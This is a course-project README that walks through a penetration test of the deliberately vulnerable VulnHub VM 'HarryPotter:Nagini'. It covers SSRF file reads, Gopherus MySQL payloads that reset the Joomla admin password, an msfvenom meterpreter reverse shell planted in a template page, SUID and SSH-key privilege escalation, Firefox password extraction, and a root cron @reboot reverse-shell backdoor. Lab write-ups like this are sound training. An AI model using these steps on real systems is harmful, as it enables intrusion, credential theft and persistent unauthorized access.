Skip to content

Penetration Testing of "HarryPotter:Nagini", a virtual machine vulnerable by design

Notifications You must be signed in to change notification settings

peppe-99/PenetrationTesting-HarryPotterNagini

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 

Repository files navigation

PenetrationTesting-HarryPotter:Nagini

This repository is dedicated to the "Penetration Testing & Ethical Hacking" course project. The project consists of the penetration testing process of "HarryPotter:Nagini", a virtual machine vulnerable by design. Originally, this VM was developed for a CTF challenge, but it can be used in other ways, for example as the asset of a penetration testing process.

At the end of the pentration testing process, the following documents were produced:

  • Penetration Testing Report;
  • Penetration Testing Narrative;
  • Digital Presentation.

You can consult these documents (in italian) in the docs folder.

Table of Contents

1. Introduction

The process of Penetration Testing allows to analyze and evaluate the security level of a computer system or network (in general of an asset) by emulating what a Black Hat Hacker might do.

This paper discusses all the steps related to the penetration testing activity performed on the HarryPotter:Nagini machine. In particularly, the entire activity is divided in the following steps:

  • Target Scoping;
  • Information Gathering;
  • Target Discovery;
  • Enumerating Target & Port Scanning;
  • Vulnerability Mapping;
  • Post Exploitation.

These steps are part of the Framework Generale per il Penetration Testing (FGPT). In our context, we can skip the "Target Scoping" phase because it's required a client that commission the penetration testing activity. In addition, it is also possible to skip the "Information Gathering" phase because the asset is a virtual machine, which means that the only information we can gather is that provided by the developer, but this has not released anything.

2. Tools and Instruments

This section will describe the tools used, more specifically the attacking machine, the target machine and the virtual environment.

Kali Linux - Attacking Machine

The Kali Linux (64-bit) operating system, version 2023.1, is used as the attack machine. It is a Debian-based GNU/Linux distribution designed for digital forensics and cybersecurity, particularly for penetration testing.

HarryPotter:Nagini - Target Machine

The HarryPotter:Nagini machine is used as the target machine. This is a virtual machine about which we are not given any information. It can be downloaded at the following link: https://www.vulnhub.com/entry/harrypotter-nagini,689/,.

Virtual Box - Virtual Environment

The Oracle VM Virtual Box software is used for the virtualization. A virtual network with NAT (called PTEH) was created to connect the two virtual machine.

3. Target Discovery

The goal of this phase is to find the target machine in the network and collect the first useful information for the next steps.

Finding the IP address

First, we try to find the target machine and get its IP address. The netdiscover tool can be used for this purpose, because we are in a local network and can define the range of IP addresses in which to search. Therefore, we run the command:

netdiscover -r 10.0.2.0/24
  • -r : range of IP addresses in which to search

The first three addresses are used by Virtual Box to handle NAT network virtualization. Therefore, we can assume by exclusion that 10.0.2.4 is the address of the Nagini virtual machine.

Reachability of the target machine

The ping command can be used to check the reachability of the target machine:

We can see that the target machine can be reached.

OS Fingerprinting

Once we have discovered the IP address of the target machine, we can proceed with an active OS Fingerprinting procedure to obtain information regarding the target machine's operating system. The nmap tool can be used. Therefore, we run the command:

nmap -O 10.0.2.4
  • -O : enables OS detection.

We discover that a Linux-based operating system, whose version is between 4.15 and 5.6, is installed on the Nagini target machine.

4. Enumerating Target & Port Scanning

Once we have discovered the IP address of the target machine and verified its reachability, we can proceed to individuate open ports (TCP and UDP) and services offered (with related version) by the target machine Nagini.

TCP Port Scanning

The netdiscover tool can be used for this purpose. More precisely, we execute the command:

nmap -sV -T5 -p- 10.0.2.4 -oX nmap_tcp_scan.xml
  • -sV : allows to obtain as much information as possibile about the services provided by the ports;
  • -T5 : allows for maximum scanning speed;
  • -p- : allows to scan all the 65535 ports;
  • -oX : the output is a XML file.

Since the output of the previous command is a XML file, we prooced to convert it to HTML format:

xsltproc nmap_tcp_scan.xml -o nmap_tcp_scan.html

The following is a table of open ports, identified by nmap, with the services offered and their version. Ports not shown in the table are closed.

UDP Port Scanning

Next, we scan the UDP ports. The unicornscan tool can be used for this purpose because is faster then nmap. The unicornscan tool isn't installed in Kali, therefore you need to install it with the following command:

sudo apt install unicornscan

Once unicornscan is installed, we can proceed to scan the UDP ports with the command:

unicornscan -mU -Iv 10.0.2.4:1-65535 -r 5000
  • -mU : indicates that the scanning mode is "UDP scanning";
  • -Iv : enables printing of results;
  • -r : indicates the rate of packets sent per second.

From the output of the previous command, you can see that there are no open UDP ports or that they are filtered.

5. Vulnerability Mapping

Once we have discovered the operating system and the services that the target machine Nagini provides, we need to understand whether or not the exposed services or the operating system have vulnerabilities that can be exploited.

Automated Vulnerability Analysis

First, we proceed with an automated vulnerability analysis. For this purpose, the two main tools used are Nessus and OpenVas. For this project, both were used so as to combine their results.

Nessus

Nessus is a widely used vulnerability scanning tool in cybersecurity that allows scans to be performed on individual target machines or entire portions of a network. As part of this project, a "Basic Network Scan" was created and performed on the target machine Nagini. The results of that scan are shown below:

We can notice that 30 vulnerabilities are discovered: 5 critical-level, one high-level and 24 info-level. The severity level, CVSS 3.0 score, and vulnerability name are shown for each vulnerability. These results are combined with those of OpenVas.

OpenVAS

OpenVas is a vulnerability mapping framework that allows scanning of one or more machines to detect detailed information. As part of this project, a "OpenVAS Default Scan" was created and executed on the target machine Nagini:

The scan results are shown below:

Nine vulnerabilities were detected, including 3 high-level, 4 medium-level, and 2 low-level vulnerabilities. For each vulnerability the name, mitigation type and severity level according to CVSS 2.0 is given. In reality the vulnerabilities found are greater, in fact for many of them it is written "Multiple Vulnerabilities."

Importantly, several vulnerabilities were found concerning Joomla!, which is a content management system for building and managing web pages. It is probably installed on the target machine Nagini.

In addition, we can see that different vulnerabilities were detected than those detected by Nessus. So it was important to use both tools so as to combine the results.

Summary

The following graphics, which can be found in the "Finding Summary" section of the Penetration Testing Report, summarize the results obtained:

Web Vulnerability Analysis

Since the Nagini target computer has a web server and exposes web services, you can proceed to discover potential web vulnerabilities. For this purpose, it is necessary to use several web vulnerability analysis tools.

Information Leakage - gobuster

We check whether there has been an exposure of critical and/or sensitive information about a web application and/or web server. This type of vulnerability can be detected and exploited through web crawling and bruteforce directory tools. For example, it is possible to use the gobuster tool. The gobuster tool isn't installed in Kali, but it can be installed with the following command:

sudo apt install gobuster

Once gobuster is installed, we can proceed with the following command:

gobuster dir -u http://10.0.2.4 -x html,txt,php,bak -w /usr/share/wordlists/dirb/common.txt
  • dir : standard directory brute-forcing mode;
  • -u : URL where scanning is performed;
  • -x : the file extensions of interest;
  • -w : wordlist to use.

From the output of the previous command we can see that we have access to the index.html page, the notes.txt file, and the presence of the /joomla directory.

The index.html page contains no useful information. In fact, its content is the following:

Instead, the content of the notes.txt file is the following:

It appears that the web server uses the HTTP3 protocol, which is currently not supported by Firefox. The following guide https://github.com/cloudflare/quiche was followed to install quiche, which is an implementation of the QUIC and HTTP3 transport protocol. In this way, the web server can be contacted using the HTTP3 protocol. In fact, once quiche is installed, the web server is contacted using the HTTP3 protocol with the command:

/quiche/target/debug/examples/http3-client https:10.0.2.4

This is the result:

The following information is obtained:

  1. A configuration backup file (.bak) exists in the web server and is readable by anyone.
  2. The presence of an /internalResourceFeTcher.php page. It wasn't discovered by gobuster and its content is the following:

This is a page for retrieving resources specified within the form. Through this page it is possible to cause the web server to make requests HTTP. In fact, if we try to enter within the form "10.0.2.4" the main page is shown:

In this case, a Server-Side Request Forgery (SSRF) vulnerability is present.

Information Leakage - JoomScan

Returning to the output of the gobuster command, there is a /joomla directory. This confirms that Joomla is installed on the Nagini machine. In fact, it is possibile to visualize the following page at http://10.0.2.4/joomla/:

The JoomScan tool can be used to discover vulnerability and missconfiguration related to the installed Joomla CMS version. This tool isn't installed on Kali, but can be installed with the following command:

sudo apt install joomscan

Once JoomScan is installed, we can proceed with the following command:

joomscan -u http://10.0.2.4/joomla 

A partial output with useful information is shown below:

A configuration.php.bak file was found. This is a configuration backup file that can be read by anyone. Therefore, let's download it:

wget http://10.0.2.4/joomla/configuration.php.bak

Let's show its content:

cat configuration.php.bak

A partial output with useful information is shown below:

We find that there is a goblin user, which is not password protected and can access to a MySQL database called joomla.

In addition, an administrator login page was found, with JoomScan tool, at http://10.0.2.4/joomla/administrator:

6. Target Exploitation

The goal of this phase is to exploit the vulnerabilities discovered during the previous Vulnerability Mapping phase in order to gain access to the target machine, derive sensitive information, and/or gain full control of the target machine.

Database Exploitation

From the Vulnerability Mapping phase, we discovered that the Nagini target machine is affected by a Server-Side Request Forgery (SSRF) vulnerability because through the /internalResourceFeTcher.php page it's possible to cause the web server to make HTTP requests to arbitrary domains. Let's try to exploit this vulnerability.

If we enter a string like file://path_to_file inside the form, the web server should show us the contents of the file on the screen. For example, if we enter file:///etc/passwd this is what we get:

We get information about all user accounts found within the server. Unfortunately, if we enter file:///etc/shadow in the form we get nothing back, probably the account associated with the web server doesn't have read permissions.

Remote Code Execution - Gopherus

Since we know that there is Server-Side Request Forgery (SSRF), we can use the Gopherus tool, which can be downloaded from the following repository https://github.com/tarunkant/Gopherus. This tool can generate a payload to exploit an SSRF vulnerability so that Remote Code Execution (RCE) can be performed. In the case of a MySQL database, the tool works only if the user who has access to the database is not protected by any password, but this is exactly our case. To run it we type the command:

gopherus -exploit mysql

At this point we need to provide the username of the user who has access to the database and the SQL code we want to run. In output we will be returned the payload.

Since we know that there is a database called joomla, let's try to generate the payload for executing the query:

USE joomla; SHOW tables;

Next, we insert the generated payload into the form of the /internalResourceFeTcher.php page, to force the query execution and get the database tables:

We find that a joomla_user table exists. At this point we re-run the gopherus tool and generate the payload for executing the query:

USE joomla; SELECT * FROM joomla_users;

In this way we obtain the joomla_users table content.

Again, we insert the generated payload into the form:

We find that each user has e-mail address as a key attribute and a password attribute. In addition, we find that the admin's e-mail is site_admin@nagini.hogwarts. At this point, we re-run the gopherus tool and generate the payload for executing the query:

USE joomla; UPDATE joomla_users
SET password='21232f297a57a5a743894a0e4a801fc3'  
WHERE email='site_admin@nagini.hogwarts';

in order to change the administrator's password. In the previous command, the string 21232f297a57a5a743894a0e4a801fc3 is the MD5 of the string admin. MD5 was used because it's supported by MySQL in Joomla.

Again, we insert the generated payload into the form:

We were able to change the administrator's password.

Remarks: after inserting the payload into the form, you need to refresh the web page several times, otherwise nothing will be displayed.

Since we have changed the administrator's password, we go to the administrator login page and try to authenticate with the new credentials:

  • username: site_admin
  • passowrd: admin

We were able to authenticate as administrator.

Client Side Exploitation

Since we are authenticated as an administrator, we can create new web pages and edit existing ones. Therefore, we can hide a reverse shell payload into a web page. In this way, whenever it will be requested, the web server will establish a connection with attacking machine, which will be listening on a certain port.

The tool msfvenom can be used to generate a reverse shell php payload. For this purpose, we execute the following command:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f raw
  • LHOST : is the IP address of the host to establish the connection with, i.e. attacking machine IP address;
  • LPORT : is the port on which to establish the connection, i.e. the port on which the attacking machine will be listening.

At this point we select, from the administrator's homepage, the Templates menu, then select the protostar template and edit the error.php error page by inserting the payload generated earlier:

Next, we start the metasploit console on the attacking machine:

Let's configure it to listen on port 4444 while waiting for the connection from the target machine to establish the reverse shell.

Through the browser we make a malformed request to retrieve the error page. For example, we can visit the url http://10.0.2.4/joomla/index.php/<>.

We were able to obtain a meterpreter shell on the target machine.

7. Post-Exploitation

Two are the main goals of this phase:

  • Privilege Escalation: acquire additional privileges inside the target machine target until maximum access privileges (root) are achieved;
  • Mantaining Access: install a backdoor which allows us to easly access into the target machine without repeating the entire attack.

Local Exploit

Since we obatained a meterpreter shell on the target machine, we can try to use the post/multi/recon/local_exploit_suggester module to discover possible exploitable local exploit. For this purpose, we execute the following command:

run post/multi/recon/local_exploit_suggester

Unfortunaly, no local exploit was found that could be used. Therefore, we proceed to a manual analysis of the target machine.

Privilege Escalation

We can obtain a bash shell with the shell -t command:

We can notice that we are authenticated as a www-data user. We enter go into /home directory and see which other users' home directories can be accessed:

We can access the home directories of snape and hermoine.

Privilege Escalation - snape user

This is the contents of snape home directory:

We can notice the presence of the .creds.txt file that can be read by anyone. This file may contain the password of the user snape. Therefore, let's show the content:

The content appears to be encoded. It could be encoded in base64. In fact, a base64-encoded string has a multiple length of 16, has only alphanumeric characters, and any padding is added at the end via "=" characters. Therefore, let's try to decode it:

We get the password of the snape user, which is Love@lilly. Let's try to authenticate ourselves as him:

Privilege Escalation - hermoine user

This is the contents of hermoine home directory:

We have access to the bin and .ssh directories but not to the mozilla directory. This is the contents of bin directory:

we can notice the presence of the executable file su_cp that has the SETUID bit enabled. This means that if you run it, you get, for the duration of its execution, the privileges of the hermoine user. Let's try to understand what this executable does:

It's an alternative version of cp command that has the SETUID bit enabled on the hermoine user permissions.

In the SSH specification there is a particular file called authorized_keys in which the SSH keys of the hosts from which we accept connections via SSH are specified. Thus, to obtain hermoine user privileges we can proceed in the following way:

  1. As a snape user, generate an SSH key with the ssh-keygen command;
  2. Create a authorized_keys file with inside the generated key with the following command:

cp .ssh/id_rsa.pub authorized_keys;
  1. Copy the file authorized_keys inside the .ssh directory of the user hermoine using the executable su_cp. In this way, the file owner will be hermoine:

  1. Authenticate as user hermoine via ssh:

we were able to authenticate ourselves as user hermoine.

Privilege Escalation - root user

In the hermoine user's home directory there is a .mozilla directory. This directory is automatically created when you start Firefox for the first time and contains the files and settings related to the said browser. We can use the firefox_decrypt tool, available at the following github repository https://github.com/unode/firefox_decrypt.

Normally this tool is used for recovering Firefox profile passwords, but we will use it to extract them. Once we have installed the tool and downloaded the .mozilla directory to the attacking machine via scp, we can run the following command to start the tool:

We get the password of the root user, which is @Alohomora#123. Let's try to authenticate ourselves as him:

Mantaining Access

In the previous Privilege Escalation step, we were able to obtain maximum privileges, i.e. root user privileges, on the Nagini target machine. At this point, to avoid having to repeat the whole process all over again, we proceed with the installation of a persistent backdoor that allows us to access the target machine more easily. For this purpose, on the attacking machine, we use the command:

msfvenom -p cmd/unix/reverse_python LHOST=10.0.2.15 LPORT=4444

to generate the payload of a python reverse shell:

Remarks: remember to replace python with python3 because python3 is installed on the target machine

Next, we create on the target machine, within the /etc directories, a script called in.sh with the payload inside.

In Unix and Unix-like operating systems, the cron command allows the scheduling of commands, that is, it allows commands to be registered with the system and then executed periodically and automatically by the system. For this purpose, through the crontab -e command we can edit the file in which the scheduled commands are indicated. We edit the said file by adding the following string:

@reboot /etc/in.sh

In this way, the target machine will execute the script containing the reverse shell payload at every startup. In this way, at each boot of the target machine, a connection will be established with the attacking machine, which will be listening on port 4444, for example, via netcat:

nc -lvp 4444

We were able to install a backdoor that gives us direct access to the target machine as the root user each time it starts up.

8. Conclusions

During the analysis of the Nagini machine, several vulnerabilities were found that would expose it to attacks by malicious users. In fact, we were able to gain full control and maximum privileges.

These vulnerabilities mainly concern:

  • Passwords stored in plain text;
  • Users without passwords;
  • Configuration files readable by anyone;
  • Executables with unfairly elevated privileges;
  • Outdated versions of operating system and applications.

We can conclude by saying that the security level of the Nagini machine is extremely low.

9. References

  1. HarryPotter:Nagini https://www.vulnhub.com/entry/harrypotter-nagini,689/
  2. Gobuster https://www.kali.org/tools/gobuster/
  3. Quiche https://github.com/cloudflare/quiche#building
  4. Joomla https://www.joomla.org/
  5. Gopherus Repository https://github.com/tarunkant/Gopherus
  6. Gopherus Blog https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/
  7. Firefox Decrypt https://github.com/unode/firefox_decrypt

About

Penetration Testing of "HarryPotter:Nagini", a virtual machine vulnerable by design

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published